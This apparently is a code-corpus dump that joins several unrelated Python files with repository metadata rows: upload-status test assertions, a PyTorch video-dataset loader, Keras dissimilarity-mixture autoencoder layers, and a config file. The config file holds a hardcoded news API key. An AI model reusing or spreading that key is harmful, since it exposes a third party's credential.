process_info = read_file('{}/process_info.json'.format(test_case_instance.ticket_path), True)
test_case_instance.assertEqual(process_info['resource_upload']['status'], 'in_progress')
# Wait until the spawned off process finishes in the background to do further validation
process_wait(process_info, test_case_instance.ticket_path)
# Verify process_info.json file data
process_info = read_file('{}/process_info.json'.format(test_case_instance.ticket_path), True)
test_case_instance.assertEqual(process_info['resource_upload']['status'], 'finished')
test_case_instance.assertEqual(process_info['resource_upload']['message'], test_case_instance.success_message)
test_case_instance.assertEqual(process_info['resource_upload']['status_code'], '200')
test_case_instance.assertEqual(process_info['resource_upload']['failed_fixity'], [])
test_case_instance.assertEqual(
process_info['resource_upload']['resources_ignored'], test_case_instance.resources_ignored)
test_case_instance.assertEqual(
process_info['resource_upload']['resources_updated'], test_case_instance.resources_updated)
test_case_instance.assertEqual(
process_info['resource_upload']['hash_algorithm'], test_case_instance.hash_algorithm)
| 54.15 | 114 | 0.775777 | 822 | 6,498 | 5.742092 | 0.100973 | 0.132203 | 0.264407 | 0.17161 | 0.941525 | 0.941525 | 0.941525 | 0.932839 | 0.924364 | 0.924364 | 0 | 0.003154 | 0.12173 | 6,498 | 119 | 115 | 54.605042 | 0.8239 | 0.124654 | 0 | 0.776316 | 0 | 0 | 0.213858 | 0.017454 | 0 | 0 | 0 | 0 | 0.394737 | 1 | 0.052632 | false | 0.013158 | 0.026316 | 0 | 0.078947 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
abd2ed72765e1006958ff1f6e30ccf0df6819a16 | 19,351 | py | Python | dataset.py | sghong977/BTSNet | a341a14ee31b193428f8087c64dba66dd9935b58 | [
"MIT"
] | null | null | null | dataset.py | sghong977/BTSNet | a341a14ee31b193428f8087c64dba66dd9935b58 | [
"MIT"
] | null | null | null | dataset.py | sghong977/BTSNet | a341a14ee31b193428f8087c64dba66dd9935b58 | [
"MIT"
] | null | null | null | from torchvision import get_image_backend
import torchvision
from datasets.videodataset import VideoDataset
from datasets.videodataset_multiclips import (VideoDatasetMultiClips,
collate_fn)
from datasets.activitynet import ActivityNet
from datasets.hollywood2 import Hollywood2, Hollywood2MultiClips
from datasets.charades import Charades, CharadesMultiClips
from datasets.epic_kitchen import EpicKitchen, EpicKitchenMultiClips
from datasets.loader import VideoLoader, VideoLoaderHDF5, VideoLoaderFlowHDF5
from datasets.kinetics import Kinetics700, Kinetics700MultiClips
import torch
# --- class for concat multiple datasets ---------------
class ConcatDataset(torch.utils.data.Dataset):
def __init__(self, *datasets):
self.datasets = datasets
def __getitem__(self, i):
return tuple(d[i] for d in self.datasets)
def __len__(self):
return min(len(d) for d in self.datasets)
#--------------------------------------------------------
def image_name_formatter(x):
return f'image_{x:05d}.jpg'
def jester_img_name_formatter(x):
return f'{x:05d}.jpg'
# epic
def epic_image_name_formatter(x):
return f'frame{x:010d}.jpg'
def epic_flow_name_formatter(flow, x):
return flow + f'_{x:010d}.jpg'
def get_training_data(video_path,
annotation_path,
dataset_name,
input_type,
file_type,
spatial_transform=None,
temporal_transform=None,
target_transform=None,
):
assert dataset_name in [
'kinetics', 'activitynet', 'ucf101', 'hmdb51', 'mit', 'jester', 'charades', 'SVW', 'hollywood2', 'epic'
]
assert input_type in ['rgb', 'flow']
assert file_type in ['jpg', 'hdf5']
if file_type == 'jpg':
assert input_type == 'rgb', 'flow input is supported only when input type is hdf5.'
if get_image_backend() == 'accimage':
from datasets.loader import ImageLoaderAccImage
loader = VideoLoader(image_name_formatter, ImageLoaderAccImage())
else:
loader = VideoLoader(image_name_formatter)
video_path_formatter = (
lambda root_path, label, video_id: root_path / label / video_id)
else:
if input_type == 'rgb':
loader = VideoLoaderHDF5()
else:
loader = VideoLoaderFlowHDF5()
video_path_formatter = (lambda root_path, label, video_id: root_path /
label / f'{video_id}.hdf5')
if dataset_name == 'activitynet':
training_data = ActivityNet(video_path,
annotation_path,
'training',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'jester':
# different loader
if get_image_backend() == 'accimage':
from datasets.loader import ImageLoaderAccImage
loader = VideoLoader(jester_img_name_formatter, ImageLoaderAccImage())
else:
loader = VideoLoader(jester_img_name_formatter)
video_path_formatter = (
lambda root_path, label, video_id: root_path / video_id) #
training_data = VideoDataset(video_path,
annotation_path,
'training',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
# different path (w/o label folder)
elif dataset_name == 'hollywood2':
video_path_formatter = (
lambda root_path, label, video_id: root_path / video_id) #
training_data = Hollywood2(video_path,
annotation_path,
'training',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'charades':
video_path_formatter = (
lambda root_path, label, video_id: root_path / video_id) #
training_data = Charades(video_path,
annotation_path,
'training',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'epic':
if get_image_backend() == 'accimage':
from datasets.loader import ImageLoaderAccImage
loader = VideoLoader(epic_image_name_formatter, ImageLoaderAccImage())
else:
loader = VideoLoader(epic_image_name_formatter)
training_data = EpicKitchen(video_path,
annotation_path,
'training',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'kinetics':
if get_image_backend() == 'accimage':
from datasets.loader import ImageLoaderAccImage
loader = VideoLoader(epic_image_name_formatter, ImageLoaderAccImage())
else:
loader = VideoLoader(epic_image_name_formatter)
training_data = Kinetics700(video_path,
annotation_path,
'train',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
else:
training_data = VideoDataset(video_path,
annotation_path,
'training',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
return training_data
def get_validation_data(video_path,
annotation_path,
dataset_name,
input_type,
file_type,
spatial_transform=None,
temporal_transform=None,
target_transform=None):
assert dataset_name in [
'kinetics', 'activitynet', 'ucf101', 'hmdb51', 'mit', 'jester', 'charades', 'SVW', 'hollywood2', 'epic'
]
assert input_type in ['rgb', 'flow']
assert file_type in ['jpg', 'hdf5']
from datasets.videodataset_multiclips import collate_fn
collate_fn = collate_fn
if file_type == 'jpg':
assert input_type == 'rgb', 'flow input is supported only when input type is hdf5.'
if get_image_backend() == 'accimage':
from datasets.loader import ImageLoaderAccImage
loader = VideoLoader(image_name_formatter, ImageLoaderAccImage())
else:
loader = VideoLoader(image_name_formatter)
video_path_formatter = (
lambda root_path, label, video_id: root_path / label / video_id)
else:
if input_type == 'rgb':
loader = VideoLoaderHDF5()
else:
loader = VideoLoaderFlowHDF5()
video_path_formatter = (lambda root_path, label, video_id: root_path /
label / f'{video_id}.hdf5')
if dataset_name == 'activitynet':
validation_data = ActivityNet(video_path,
annotation_path,
'validation',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'jester':
# different loader
if get_image_backend() == 'accimage':
from datasets.loader import ImageLoaderAccImage
loader = VideoLoader(jester_img_name_formatter, ImageLoaderAccImage())
else:
loader = VideoLoader(jester_img_name_formatter)
video_path_formatter = (
lambda root_path, label, video_id: root_path / video_id) #
validation_data = VideoDatasetMultiClips(
video_path,
annotation_path,
'validation',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
# different path : w/o label
elif dataset_name == 'hollywood2':
from datasets.hollywood2 import collate_fn_val
collate_fn = collate_fn_val
video_path_formatter = (
lambda root_path, label, video_id: root_path / video_id) #
validation_data = Hollywood2MultiClips(
video_path,
annotation_path,
'validation',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'charades':
from datasets.charades import collate_fn_val
collate_fn = collate_fn_val
video_path_formatter = (
lambda root_path, label, video_id: root_path / video_id) #
validation_data = CharadesMultiClips(
video_path,
annotation_path,
'validation',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'epic':
if get_image_backend() == 'accimage':
from datasets.loader import ImageLoaderAccImage
loader = VideoLoader(epic_image_name_formatter, ImageLoaderAccImage())
else:
loader = VideoLoader(epic_image_name_formatter)
validation_data = EpicKitchenMultiClips(
video_path,
annotation_path,
'validation',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'kinetics':
if get_image_backend() == 'accimage':
from datasets.loader import ImageLoaderAccImage
loader = VideoLoader(epic_image_name_formatter, ImageLoaderAccImage())
else:
loader = VideoLoader(epic_image_name_formatter)
validation_data = Kinetics700(
video_path,
annotation_path,
'validation',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
else:
validation_data = VideoDatasetMultiClips(
video_path,
annotation_path,
'validation',
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
return validation_data, collate_fn
# different scenario when charades or hollywood2
def get_inference_data(video_path,
annotation_path,
dataset_name,
input_type,
file_type,
inference_subset,
spatial_transform=None,
temporal_transform=None,
target_transform=None):
assert dataset_name in [
'kinetics', 'activitynet', 'ucf101', 'hmdb51', 'mit', 'charades', 'SVW', 'hollywood2', 'epic'
]
assert input_type in ['rgb', 'flow']
assert file_type in ['jpg', 'hdf5']
assert inference_subset in ['train', 'val', 'test']
if file_type == 'jpg':
assert input_type == 'rgb', 'flow input is supported only when input type is hdf5.'
if get_image_backend() == 'accimage':
from datasets.loader import ImageLoaderAccImage
loader = VideoLoader(image_name_formatter, ImageLoaderAccImage())
else:
loader = VideoLoader(image_name_formatter)
video_path_formatter = (
lambda root_path, label, video_id: root_path / label / video_id)
else:
if input_type == 'rgb':
loader = VideoLoaderHDF5()
else:
loader = VideoLoaderFlowHDF5()
video_path_formatter = (lambda root_path, label, video_id: root_path /
label / f'{video_id}.hdf5')
if inference_subset == 'train':
subset = 'training'
elif inference_subset == 'val':
subset = 'validation'
elif inference_subset == 'test':
subset = 'inference'
if dataset_name == 'activitynet':
inference_data = ActivityNet(video_path,
annotation_path,
subset,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter,
is_untrimmed_setting=True)
elif dataset_name == 'hollywood2':
from datasets.hollywood2 import collate_fn
video_path_formatter = (
lambda root_path, video_id: root_path / video_id) #
inference_data = Hollywood2MultiClips( #MultiClips
video_path,
annotation_path,
subset,
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'charades':
from datasets.charades import collate_fn
loader = VideoLoader(image_name_formatter)
video_path_formatter = (
lambda root_path, video_id: root_path / video_id) #
inference_data = CharadesMultiClips( #MultiClips
video_path,
annotation_path,
subset,
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'epic':
from datasets.epic_kitchen import collate_fn
# loader = VideoLoader(image_name_formatter)
# video_path_formatter = (
# lambda root_path, video_id: root_path / video_id) #
inference_data = CharadesMultiClips( #MultiClips
video_path,
annotation_path,
subset,
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
elif dataset_name == 'kinetics':
from datasets.epic_kitchen import collate_fn
# loader = VideoLoader(image_name_formatter)
# video_path_formatter = (
# lambda root_path, video_id: root_path / video_id) #
inference_data = CharadesMultiClips( #MultiClips
video_path,
annotation_path,
subset,
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter)
else:
inference_data = VideoDataset( #MultiClips
video_path,
annotation_path,
subset,
data_name=dataset_name,
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform,
video_loader=loader,
video_path_formatter=video_path_formatter,
target_type=['label'])
return inference_data, collate_fn | 43.097996 | 111 | 0.566689 | 1,683 | 19,351 | 6.150921 | 0.062983 | 0.068682 | 0.097372 | 0.073029 | 0.874614 | 0.861476 | 0.84148 | 0.84148 | 0.84148 | 0.84148 | 0 | 0.005647 | 0.368611 | 19,351 | 449 | 112 | 43.097996 | 0.841627 | 0.030851 | 0 | 0.825316 | 0 | 0 | 0.048385 | 0 | 0 | 0 | 0 | 0 | 0.032911 | 1 | 0.025316 | false | 0 | 0.068354 | 0.01519 | 0.118987 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
abf69ae308b0b4a8ddbeb8bd0737ab3d1b1a40eb | 15,724 | py | Python | dmae/layers.py | larajuse/DMAE | 48fafdd257a8e172c66a67d2311120c481488513 | [
"MIT"
] | 8 | 2020-06-17T20:03:18.000Z | 2021-01-09T01:43:55.000Z | dmae/layers.py | juselara1/dmae | 48fafdd257a8e172c66a67d2311120c481488513 | [
"MIT"
] | 12 | 2021-01-28T06:35:25.000Z | 2022-03-12T00:54:32.000Z | dmae/layers.py | juselara1/dmae | 48fafdd257a8e172c66a67d2311120c481488513 | [
"MIT"
] | 3 | 2021-01-25T21:29:11.000Z | 2021-11-28T20:49:14.000Z | # -*- coding: utf-8 -*-
"""
The :mod:`dmae.layers` module implements the dissimilarity mixture autoencoder (DMAE) layers as
tensorflow keras layers.
"""
# Author: Juan S. Lara <julara@unal.edu.co>
# License: MIT
import tensorflow as _tf
from tensorflow.keras.layers import Layer as _Layer
from tensorflow.keras.initializers import RandomUniform as _RandomUniform, Constant as _Constant
from dmae import dissimilarities as _dissimilarities
class DissimilarityMixtureAutoencoder(_Layer):
"""
A :mod:`tf.keras` layer with the Dissimilarity Mixture Autoencoder (DMAE).
Parameters
----------
alpha : float
Softmax inverse temperature.
n_clusters : int
Number of clusters.
dissimilarity : function, default = :mod:`dmae.dissimilarities.euclidean`
A tensorflow function that computes a pairwise dissimilarity function
between a batch of points and the cluster's parameters.
trainable : dict, default = {"centers": True, "mixers": True}
Specifies which parameters are trainable.
initializers : dict, default = {"centers": :mod:`RandomUniform(-1, 1)`, "mixers": :mod:`Constant(1.0)`}
Specifies a keras initializer (:mod:`tf.keras.initializers`) for each parameter.
regularizers : dict, default = {"centers": None, "mixers": None}
Specifies a keras regularizer (:mod:`tf.keras.regularizers`) for each parameter.
"""
def __init__(
self, alpha, n_clusters,
dissimilarity=_dissimilarities.euclidean,
trainable={"centers": True, "mixers": False},
initializers={
"centers": _RandomUniform(-1, 1),
"mixers": _Constant(1.0)
},
regularizers={"centers": None, "mixers": None},
**kwargs
):
self.__alpha = _tf.constant(alpha, dtype=_tf.float32)
self.__n_clusters = n_clusters
self.__dissimilarity = dissimilarity
self.__trainable = trainable
self.__initializers = initializers
self.__regularizers = regularizers
super(DissimilarityMixtureAutoencoder, self).__init__(**kwargs)
def call(self, x):
"""
Forward pass in DMAE.
Parameters
----------
x : array_like
Input tensor.
Returns
-------
mu_tilde : array_like
Soft-assigned centroids.
pi_tilde : array_like
Soft-assigned mixing coefficients.
"""
# computes pairwise dissimilarities
D = self.__dissimilarity(x, self.centers)
# computes the soft-assignements
assigns = _tf.nn.softmax(
-self.__alpha * D +\
_tf.math.log(_tf.math.abs(self.mixers))
)
# soft-assigned centroids
mu_tilde = _tf.matmul(assigns, self.centers)
# soft-assigned mixing coefficients
pi_tilde = _tf.reduce_sum(
assigns * self.mixers,
axis=1
)
return mu_tilde, pi_tilde
def build(self, input_shape):
"""
Builds the tensorflow variables.
Parameters
----------
input_shape : tuple
Input tensor shape.
"""
self.centers = self.add_weight(
name="centers",
initializer=self.__initializers["centers"],
shape=(self.__n_clusters, input_shape[1]),
trainable=self.__trainable["centers"],
regularizer=self.__regularizers["centers"],
)
self.mixers = self.add_weight(
name="mixers",
initializer=self.__initializers["mixers"],
shape=(1, self.__n_clusters),
trainable=self.__trainable["mixers"],
regularizer=self.__regularizers["mixers"],
)
super(DissimilarityMixtureAutoencoder, self).build(input_shape)
class DissimilarityMixtureEncoder(_Layer):
"""
A tf.keras layer that implements the dissimilarity mixture encoder (DM-Encoder).
It computes the soft assignments using a dissimilarity function from
:mod:`dmae.dissimilarities`.
Parameters
----------
alpha : float
Softmax inverse temperature.
n_clusters : int
Number of clusters.
dissimilarity : function, default = :mod:`dmae.dissimilarities.euclidean`
A tensorflow function that computes a pairwise dissimilarity function
between a batch of points and the cluster's parameters.
trainable : dict, default = {"centers": True, "mixers": True}
Specifies which parameters are trainable.
initializers : dict, default = {"centers": :mod:`RandomUniform(-1, 1)`, "mixers": :mod:`Constant(1.0)`}
Specifies a keras initializer (:mod:`tf.keras.initializers`) for each parameter.
regularizers : dict, default = {"centers": None, "mixers": None}
Specifies a keras regularizer (:mod:`tf.keras.regularizers`) for each parameter.
"""
def __init__(
self, alpha, n_clusters,
dissimilarity=_dissimilarities.euclidean,
trainable={"centers": True, "mixers": False},
initializers={
"centers": _RandomUniform(-1, 1),
"mixers": _Constant(1.0)
},
regularizers={"centers": None, "mixers": None},
**kwargs
):
self.__alpha = _tf.constant(alpha, dtype=_tf.float32)
self.__n_clusters = n_clusters
self.__dissimilarity = dissimilarity
self.__trainable = trainable
self.__initializers = initializers
self.__regularizers = regularizers
super(DissimilarityMixtureEncoder, self).__init__(**kwargs)
def call(self, x):
"""
Forward pass in DM-Encoder.
Parameters
----------
x : array_like
Input tensor.
Returns
-------
S : array_like
Soft assignments.
"""
# compute pairwise dissimilarities
D = self.__dissimilarity(x, self.centers)
# compute the soft assignments
assigns = _tf.nn.softmax(
-self.__alpha * D +\
_tf.math.log(_tf.nn.relu(self.mixers))
)
return assigns
def build(self, input_shape):
"""
Builds the tensorflow variables.
Parameters
----------
input_shape : tuple
Input tensor shape.
"""
self.centers = self.add_weight(
name="centers",
initializer=self.__initializers["centers"],
shape=(self.__n_clusters, input_shape[1]),
trainable=self.__trainable["centers"],
regularizer=self.__regularizers["centers"]
)
self.mixers = self.add_weight(
name="mixers",
initializer=self.__initializers["mixers"],
shape=(1, self.__n_clusters),
trainable=self.__trainable["mixers"],
regularizer=self.__regularizers["mixers"]
)
super(DissimilarityMixtureEncoder, self).build(input_shape)
class DissimilarityMixtureAutoencoderCov(_Layer):
"""
A :mod:`tf.keras` layer with the Dissimilarity Mixture Autoencoder (DMAE).
This layer includes a covariance parameter for dissimilarities that allow it.
Parameters
----------
alpha : float
Softmax inverse temperature.
n_clusters : int
Number of clusters.
dissimilarity : function, default = :mod:`dmae.dissimilarities.mahalanobis`
A tensorflow function that computes a pairwise dissimilarity function
between a batch of points and the cluster's parameters.
trainable : dict, default = {"centers": True, "cov": True, mixers": True}
Specifies which parameters are trainable.
initializers : dict, default = {"centers": :mod:`RandomUniform(-1, 1)`, "cov": :mod:`RandomUniform(-1, 1)`
"mixers": :mod:`Constant(1.0)`}
Specifies a keras initializer (:mod:`tf.keras.initializers`) for each parameter.
regularizers : dict, default = {"centers": None, "cov": None, "mixers": None}
Specifies a keras regularizer (:mod:`tf.keras.regularizers`) for each parameter.
"""
def __init__(
self, alpha, n_clusters,
dissimilarity=_dissimilarities.mahalanobis,
trainable={"centers": True, "cov": True, "mixers": True},
initializers={
"centers": _RandomUniform(-1, 1),
"cov": _RandomUniform(-1, 1),
"mixers": _Constant(1.0),
},
grad_modifier=1,
regularizers={"centers": None, "cov": None, "mixers": None},
**kwargs
):
self.__alpha =_tf.constant(alpha, dtype=_tf.float32)
self.__n_clusters = n_clusters
self.__dissimilarity = dissimilarity
self.__trainable = trainable
self.__initializers = initializers
self.__regularizers = regularizers
super(DissimilarityMixtureAutoencoderCov, self).__init__(**kwargs)
def call(self, x):
"""
Forward pass in DMAE.
Parameters
----------
x : array_like
Input tensor.
Returns
-------
mu_tilde : array_like
Soft-assigned centroids.
Cov_hat : array_like
Soft-assigned covariance matrices.
pi_tilde : array_like
Soft-assigned mixing coefficients.
"""
# compute PSD matrix.
cov =_tf.matmul(self.cov,_tf.transpose(self.cov, [0, 2, 1]))
# compute pairwise dissimilarities.
D = self.__dissimilarity(x, self.centers, cov)
# compute the soft assignments.
assigns = _tf.nn.softmax(
-self.__alpha * D +\
_tf.math.log(_tf.nn.relu(self.mixers))
)
# soft-assigned centroids
mu_hat = _tf.matmul(
assigns, self.centers
)
# soft-assigned covariance matrices
Cov_hat = _tf.tensordot(
assigns, cov, axes=[[1], [0]]
)
# soft-assigned mixing coefficients
pi_tilde = _tf.reduce_sum(
assigns * self.mixers,
axis=1
)
return mu_hat, Cov_hat, pi_tilde
def build(self, input_shape):
"""
Builds the tensorflow variables.
Parameters
----------
input_shape : tuple
Input tensor shape.
"""
self.centers = self.add_weight(
name="centers",
initializer=self.__initializers["centers"],
shape=(self.__n_clusters, input_shape[1]),
trainable=self.__trainable["centers"],
regularizer=self.__regularizers["centers"]
)
self.cov = self.add_weight(
name="cov",
initializer=self.__initializers["cov"],
shape=(self.__n_clusters, input_shape[1], input_shape[1]),
trainable=self.__trainable["cov"],
regularizer=self.__regularizers["cov"]
)
self.mixers = self.add_weight(
name="mixers",
initializer=self.__initializers["mixers"],
shape=(1, self.__n_clusters),
trainable=self.__trainable["mixers"],
regularizer=self.__regularizers["mixers"]
)
super(DissimilarityMixtureAutoencoderCov, self).build(input_shape)
class DissimilarityMixtureEncoderCov(_Layer):
"""
A tf.keras layer that implements the dissimilarity mixture encoder (DM-Encoder).
It computes the soft assignments using a dissimilarity function from
:mod:`dmae.dissimilarities`. This layer includes a covariance parameter for
dissimilarities that allow it.
Parameters
----------
alpha : float
Softmax inverse temperature.
n_clusters : int
Number of clusters.
dissimilarity : function, default = :mod:`dmae.dissimilarities.mahalanobis`
A tensorflow function that computes a pairwise dissimilarity function
between a batch of points and the cluster's parameters.
trainable : dict, default = {"centers": True, "cov": True, mixers": True}
Specifies which parameters are trainable.
initializers : dict, default = {"centers": :mod:`RandomUniform(-1, 1)`, "cov": :mod:`RandomUniform(-1, 1)`
"mixers": :mod:`Constant(1.0)`}
Specifies a keras initializer (:mod:`tf.keras.initializers`) for each parameter.
regularizers : dict, default = {"centers": None, "cov": None, "mixers": None}
Specifies a keras regularizer (:mod:`tf.keras.regularizers`) for each parameter.
"""
def __init__(
self, alpha, n_clusters,
dissimilarity=_dissimilarities.mahalanobis,
trainable={"centers": True, "cov": True, "mixers": True},
initializers={
"centers": _RandomUniform(-1, 1),
"cov": _RandomUniform(-1, 1),
"mixers": _Constant(1.0),
},
regularizers={"centers": None, "cov": None, "mixers": None},
**kwargs
):
self.__alpha = _tf.constant(alpha, dtype=_tf.float32)
self.__n_clusters = n_clusters
self.__dissimilarity = dissimilarity
self.__trainable = trainable
self.__initializers = initializers
self.__regularizers = regularizers
super(DissimilarityMixtureEncoderCov, self).__init__(**kwargs)
def call(self, x):
"""
Forward pass in DM-Encoder.
Parameters
----------
x : array_like
Input tensor.
Returns
-------
S : array_like
Soft assignments.
"""
# computes PSD matrix
cov = _tf.matmul(self.cov, _tf.transpose(self.cov, [0, 2, 1]))
# computes pairwise dissimilarities.
D = self.__dissimilarity(
x, self.centers, cov
)
# computes the soft assignments.
assigns = _tf.nn.softmax(
-self.__alpha * D +\
_tf.math.log(_tf.nn.relu(self.mixers))
)
return assigns
def build(self, input_shape):
"""
Builds the tensorflow variables.
Parameters
----------
input_shape : tuple
Input tensor shape.
"""
self.centers = self.add_weight(
name="centers",
initializer=self.__initializers["centers"],
shape=(self.__n_clusters, input_shape[1]),
trainable=self.__trainable["centers"],
regularizer=self.__regularizers["centers"]
)
self.cov = self.add_weight(
name="cov",
initializer=self.__initializers["cov"],
shape=(self.__n_clusters, input_shape[1], input_shape[1]),
trainable=self.__trainable["cov"],
regularizer=self.__regularizers["cov"]
)
self.mixers = self.add_weight(
name="mixers",
initializer=self.__initializers["mixers"],
shape=(1, self.__n_clusters),
trainable=self.__trainable["mixers"],
regularizer=self.__regularizers["mixers"]
)
super(DissimilarityMixtureEncoderCov, self).build(input_shape)
| 35.098214 | 110 | 0.574917 | 1,482 | 15,724 | 5.888664 | 0.099865 | 0.026813 | 0.020855 | 0.01948 | 0.899049 | 0.886444 | 0.880028 | 0.872694 | 0.862152 | 0.833734 | 0 | 0.006701 | 0.316713 | 15,724 | 447 | 111 | 35.176734 | 0.805566 | 0.359959 | 0 | 0.745192 | 0 | 0 | 0.04466 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057692 | false | 0 | 0.019231 | 0 | 0.115385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e65622f4a7635895c06d92b19bd9b8d121193d4b | 123 | py | Python | mmdet/models/backbones/__init__.py | JwDong2019/CVWC-2019-FCOS | 9c343dc820aea7bc79ee0b8206527fa48ebf106f | [
"Apache-2.0"
] | null | null | null | mmdet/models/backbones/__init__.py | JwDong2019/CVWC-2019-FCOS | 9c343dc820aea7bc79ee0b8206527fa48ebf106f | [
"Apache-2.0"
] | null | null | null | mmdet/models/backbones/__init__.py | JwDong2019/CVWC-2019-FCOS | 9c343dc820aea7bc79ee0b8206527fa48ebf106f | [
"Apache-2.0"
] | null | null | null | from .resnet import ResNet, make_res_layer
from .resnext import ResNeXt
__all__ = ['ResNet', 'make_res_layer', 'ResNeXt']
| 24.6 | 49 | 0.764228 | 17 | 123 | 5.058824 | 0.470588 | 0.232558 | 0.302326 | 0.418605 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121951 | 123 | 4 | 50 | 30.75 | 0.796296 | 0 | 0 | 0 | 0 | 0 | 0.219512 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0515389e10f64171d85b734c386c1b0c6ac3f789 | 49 | py | Python | instance/config.py | mazimpakar/News-Highlight | dfbf9289fc3e37dd7772ca18003eadeb1855425e | [
"MIT"
] | null | null | null | instance/config.py | mazimpakar/News-Highlight | dfbf9289fc3e37dd7772ca18003eadeb1855425e | [
"MIT"
] | null | null | null | instance/config.py | mazimpakar/News-Highlight | dfbf9289fc3e37dd7772ca18003eadeb1855425e | [
"MIT"
] | null | null | null | NEWS_API_KEY = 'f64a31e5dca5460ab7e3f34713eb9670' | 49 | 49 | 0.897959 | 4 | 49 | 10.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.425532 | 0.040816 | 49 | 1 | 49 | 49 | 0.468085 | 0 | 0 | 0 | 0 | 0 | 0.64 | 0.64 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
056de49aa4594abbb2d12a3998b696e0daec2cf8 | 9,824 | py | Python | v6.0.5/user/test_fortios_user_setting.py | fortinet-solutions-cse/ansible_fgt_modules | c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719 | [
"Apache-2.0"
] | 14 | 2018-09-25T20:35:25.000Z | 2021-07-14T04:30:54.000Z | v6.0.5/user/test_fortios_user_setting.py | fortinet-solutions-cse/ansible_fgt_modules | c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719 | [
"Apache-2.0"
